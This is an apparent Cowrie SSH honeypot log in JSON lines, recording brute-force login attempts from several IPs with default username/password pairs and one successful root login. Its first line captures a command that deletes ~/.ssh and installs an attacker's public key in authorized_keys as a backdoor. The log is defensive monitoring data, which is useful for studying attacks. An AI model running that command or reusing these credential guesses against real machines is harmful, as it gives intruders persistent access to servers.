{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.773598Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.979717Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.980686Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.session.connect","src_ip":"200.195.162.69","src_port":57884,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e782cbbb0ca","protocol":"ssh","message":"New connection: 200.195.162.69:57884 (1.2.3.4:22) [session: 3e782cbbb0ca]","sensor":"my-vps","timestamp":"2025-08-26T22:08:20.180721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:08:20.181430Z","src_ip":"200.195.162.69","session":"3e782cbbb0ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:08:20.385307Z","src_ip":"200.195.162.69","session":"3e782cbbb0ca"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:20.413516Z","src_ip":"212.227.125.160","session":"157801d0e2c4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:21.239753Z","src_ip":"200.195.162.69","session":"3e782cbbb0ca"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:22.445404Z","src_ip":"200.195.162.69","session":"3e782cbbb0ca"}
{"eventid":"cowrie.session.connect","src_ip":"200.195.162.69","src_port":59214,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2de412c7df","protocol":"ssh","message":"New connection: 200.195.162.69:59214 (1.2.3.4:22) [session: 0f2de412c7df]","sensor":"my-vps","timestamp":"2025-08-26T22:08:22.646644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:08:22.647732Z","src_ip":"200.195.162.69","session":"0f2de412c7df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:08:22.850089Z","src_ip":"200.195.162.69","session":"0f2de412c7df"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:08:23.698976Z","src_ip":"200.195.162.69","session":"0f2de412c7df"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:23.902357Z","src_ip":"200.195.162.69","session":"0f2de412c7df"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:23.903512Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60436,"dst_ip":"1.2.3.4","dst_port":22,"session":"d533f2d4c312","protocol":"ssh","message":"New connection: 212.227.235.229:60436 (1.2.3.4:22) [session: d533f2d4c312]","sensor":"my-vps","timestamp":"2025-08-26T22:08:24.616093Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41978,"dst_ip":"1.2.3.4","dst_port":22,"session":"b97d33c4be94","protocol":"ssh","message":"New connection: 212.227.125.160:41978 (1.2.3.4:22) [session: b97d33c4be94]","sensor":"my-vps","timestamp":"2025-08-26T22:08:24.712734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:24.752372Z","src_ip":"212.227.125.160","session":"b97d33c4be94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:24.797079Z","src_ip":"212.227.125.160","session":"b97d33c4be94"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:25.030849Z","src_ip":"212.227.125.160","session":"b97d33c4be94"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:26.098388Z","src_ip":"212.227.125.160","session":"b97d33c4be94"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:27.455363Z","src_ip":"212.227.235.229","session":"d533f2d4c312"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:08:27.456074Z","src_ip":"212.227.235.229","session":"d533f2d4c312"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37364,"dst_ip":"1.2.3.4","dst_port":22,"session":"d79ddca6d223","protocol":"ssh","message":"New connection: 212.227.125.160:37364 (1.2.3.4:22) [session: d79ddca6d223]","sensor":"my-vps","timestamp":"2025-08-26T22:08:30.371351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:30.372586Z","src_ip":"212.227.125.160","session":"d79ddca6d223"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:30.420828Z","src_ip":"212.227.125.160","session":"d79ddca6d223"}
{"eventid":"cowrie.login.failed","username":"grml","password":"grml","message":"login attempt [grml/grml] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:30.568172Z","src_ip":"212.227.125.160","session":"d79ddca6d223"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:31.613884Z","src_ip":"212.227.125.160","session":"d79ddca6d223"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssword","message":"login attempt [admin/P@ssword] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:33.030633Z","src_ip":"212.227.235.229","session":"d533f2d4c312"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:35.066140Z","src_ip":"212.227.235.229","session":"d533f2d4c312"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60988,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bcff7ca3280","protocol":"ssh","message":"New connection: 212.227.125.160:60988 (1.2.3.4:22) [session: 2bcff7ca3280]","sensor":"my-vps","timestamp":"2025-08-26T22:08:35.856233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:35.857386Z","src_ip":"212.227.125.160","session":"2bcff7ca3280"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:35.918068Z","src_ip":"212.227.125.160","session":"2bcff7ca3280"}
{"eventid":"cowrie.login.failed","username":"pfd","password":"pfd","message":"login attempt [pfd/pfd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:36.162505Z","src_ip":"212.227.125.160","session":"2bcff7ca3280"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:37.406499Z","src_ip":"212.227.125.160","session":"2bcff7ca3280"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56372,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9576fa6aae9","protocol":"ssh","message":"New connection: 212.227.125.160:56372 (1.2.3.4:22) [session: c9576fa6aae9]","sensor":"my-vps","timestamp":"2025-08-26T22:08:41.611035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:41.840853Z","src_ip":"212.227.125.160","session":"c9576fa6aae9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:41.841586Z","src_ip":"212.227.125.160","session":"c9576fa6aae9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:42.936952Z","src_ip":"212.227.125.160","session":"c9576fa6aae9"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":59976,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f5f8842a736","protocol":"ssh","message":"New connection: 106.12.128.104:59976 (1.2.3.4:22) [session: 8f5f8842a736]","sensor":"my-vps","timestamp":"2025-08-26T22:08:42.939018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:08:42.939819Z","src_ip":"106.12.128.104","session":"8f5f8842a736"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:08:43.160827Z","src_ip":"106.12.128.104","session":"8f5f8842a736"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:44.021722Z","src_ip":"212.227.125.160","session":"c9576fa6aae9"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts123","message":"login attempt [ts/ts123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:44.087481Z","src_ip":"106.12.128.104","session":"8f5f8842a736"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.236.127","src_port":55206,"dst_ip":"1.2.3.4","dst_port":22,"session":"46f9d1665d65","protocol":"ssh","message":"New connection: 14.103.236.127:55206 (1.2.3.4:22) [session: 46f9d1665d65]","sensor":"my-vps","timestamp":"2025-08-26T22:08:44.958059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:08:44.958805Z","src_ip":"14.103.236.127","session":"46f9d1665d65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:08:45.146740Z","src_ip":"14.103.236.127","session":"46f9d1665d65"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:45.311313Z","src_ip":"106.12.128.104","session":"8f5f8842a736"}
{"eventid":"cowrie.login.failed","username":"tor","password":"tor","message":"login attempt [tor/tor] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:45.927032Z","src_ip":"14.103.236.127","session":"46f9d1665d65"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:47.114360Z","src_ip":"14.103.236.127","session":"46f9d1665d65"}
